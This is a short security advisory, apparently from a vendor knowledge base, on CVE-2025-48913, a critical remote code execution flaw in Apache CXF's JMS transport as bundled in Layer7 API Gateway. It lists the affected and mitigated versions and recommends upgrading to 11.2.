The below vulnerabilities have been identified in a vulnerability scan. 

The scan was performed post applying the Layer7_API_PlatformUpdate_64bit_v11.1-Debian-2025-11-25.L7P patch.

• CVE ID: CVE-2025-48913
• Component: Apache CXF (Java Message Service transport)
• Severity: Critical (CVSS 9.8)
• Description: A remote code execution (RCE) vulnerability exists in Apache CXF's JMS configuration. If untrusted users can configure JMS settings, they could specify malicious RMI or LDAP URLs to execute arbitrary code.

Gateway 11.1.x and all supported versions of Gateway Appliance deployments.

• Gateway Version 11.2.x: Not Vulnerable. This version includes Apache CXF 4.0.9, which contains the official fix for CVE-2025-48913.
• Gateway Versions 11.1.2, 11.1.3: Mitigated by Analysis. While these versions contain the affected Apache CXF 3.5.11 library, the Gateway is not exploitable because:
  • The Gateway does not use vulnerable Apache CXF classes (e.g., JaxWsServerFactoryBean) for JMS connection management.
  • JMS connection parameters are not exposed to unauthenticated users via APIs, preventing attackers from injecting malicious URLs.

• Primary Recommendation: Upgrade to Layer7 API Gateway 11.2+ or higher. This release provides a permanent fix by upgrading the library to CXF 4.0.9 and includes other major platform updates such as JDK 21 and Tomcat 10.1.
• Policy for 11.1.x: No backport to 11.1.x is planned due to significant library updates that need to be done to upgrade Apache CXF from 3.5.x to 3.6.x required for the library migration.

National Vulnerability Database

CVE Record Information